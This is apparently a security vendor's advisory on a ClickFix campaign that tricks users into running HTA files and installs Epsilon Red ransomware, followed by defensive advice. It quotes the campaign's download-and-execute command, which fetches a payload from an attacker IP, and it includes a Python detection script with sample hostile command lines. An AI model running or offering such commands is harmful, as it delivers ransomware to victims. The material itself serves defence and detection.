New ClickFix Campaign Uses HTA Files to Spread Epsilon Red Ransomware

Cybercriminals are disguising ransomware attacks as harmless verification steps using fake websites that mimic trusted platforms. Learn how the threat works and what you can do to stay protected.

“What Makes This New Campaign So Dangerous?”

A newly discovered ransomware campaign is using an updated twist on the ClickFix social engineering method, which tricks users into downloading HTML Application (HTA) files. The result? Installation of Epsilon Red ransomware and widespread system compromise. Historically, the ClickFix technique deceives users into taking an action to “fix” a non-existent issue by copying and pasting a malicious command into their terminal or Run dialog. The lure is a pop-up dialog that asks the user to click a button such as “Fix It” or “I am not a robot,” to name just two of the variants observed.

Researchers at CloudSEK’s TRIAD team uncovered the campaign where hackers set up fake verification portals, mimicking well-known brands such as Twitch, Discord’s Captcha Bot, OnlyFans, Kick, and Rumble. These spoofed websites prompt users to complete what appears to be an “extra verification step” for access, prompting the user to save and open a seemingly innocuous file.

But that file isn’t harmless; it’s a .hta file that, once executed, runs JavaScript leveraging legacy features like ActiveXObject and WScript.Shell to download and launch a ransomware attack. The site even displays a fake verification code to create a false sense of legitimacy after the malware is already running.

“How Does the Attack Actually Work?”

Rather than using traditional copy-paste command prompts like earlier ClickFix schemes, this version ups the ante:

  1. Users are prompted to press CTRL+S to download a file

  2. They are instructed to rename it to verify.hta

  3. Victims are told to open it using Microsoft HTML Application Host (mshta.exe)

  4. A fake popup appears, and they are guided to enter a “verification code”

Unbeknownst to them, this sequence triggers a background command:

cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe

This command changes into the user’s profile directory, uses the curl command-line tool to silently download the Epsilon Red ransomware payload as a.exe, and then executes it.

“What Is Epsilon Red and Why Should I Be Concerned?”

Epsilon Red is a ransomware strain first identified in 2021. While its ransom note design mimics REvil, its technical infrastructure and behavior are unique. It uses double extortion tactics, encrypting files and threatening to leak stolen data unless a ransom is paid.

This latest campaign demonstrates a more polished and deceptive infection vector, increasing the likelihood of successful attacks on unsuspecting users. The use of ActiveX and WScript.Shell also allows the malware to bypass modern web protections by exploiting legacy Windows components.

“What Can I Do to Protect My Systems and Team?”

Here are three key ways to defend against this evolving threat:

  1. Block Legacy Scripting Technologies – Disable ActiveXObject and WScript.Shell via Group Policy or endpoint configurations. These features are rarely needed and commonly abused by threat actors.

  2. Implement EDR Rules and Threat Feeds – Use Endpoint Detection and Response (EDR) tools to flag suspicious child processes created by browsers, and ingest threat intelligence feeds to block known Epsilon Red IPs and domains.

  3. Educate Your Workforce – Raise employee awareness of social engineering tricks, fake verification sites, and brand impersonation. Awareness training should highlight the risks of downloading and running unexpected files.
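The EDR logic in point 2, written out as an added Python example (not code from CloudSEK or the original post): it triages constructed Sysmon-style process-creation records and flags mshta.exe launching an .hta from a user-writable folder, a script host spawning a shell, and a curl download-then-execute one-liner of the shape shown above. The sample events and the TEST-NET IP address are constructed placeholders, not indicators from the campaign.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style), not real telemetry;
# the IP is a TEST-NET placeholder standing in for the download server.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Users\u\Downloads\verify.hta"'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c cd /D %userprofile% && curl -s -o a.exe "
                    r"http://203.0.113.10:2269/dw/vir.exe && a.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData)\\", re.IGNORECASE)
# "curl ... -o <file> http://... && <file>": fetch to disk, then run what was fetched
DOWNLOAD_EXEC = re.compile(
    r"curl\b[^&|]*-o\s+(?P<out>\S+)\s+https?://\S+.*?(?:&&|\|\||;)\s*(?P=out)\b",
    re.IGNORECASE)

def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the names of the detection rules a single event matches."""
    parent, child, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    hits = []
    if child == "mshta.exe" and USER_WRITABLE.search(cmd) and ".hta" in cmd.lower():
        hits.append("mshta_runs_hta_from_user_dir")
    if parent in SCRIPT_HOSTS and child in SHELLS:
        hits.append("script_host_spawns_shell")
    if DOWNLOAD_EXEC.search(cmd):
        hits.append("curl_download_then_execute")
    return hits

def triage(events):
    """Map event index -> matched rules, keeping only events that matched something."""
    results = {i: classify(ev) for i, ev in enumerate(events)}
    return {i: rules for i, rules in results.items() if rules}

if __name__ == "__main__":
    for i, rules in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["CommandLine"], rules)
```

Feeding real Sysmon or EDR process-creation events into triage() only requires mapping their parent image, image and command-line fields onto the same three keys.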

Need support building a layered defense plan? Let’s talk about our Vulnerability Assessment, Cybersecurity Policy & Controls (focusing on Business Continuity Planning), and training your team with our Phishing Simulations and Awareness Training. By planning ahead, we can help you keep doing what you do best. Don’t let deception compromise your business.
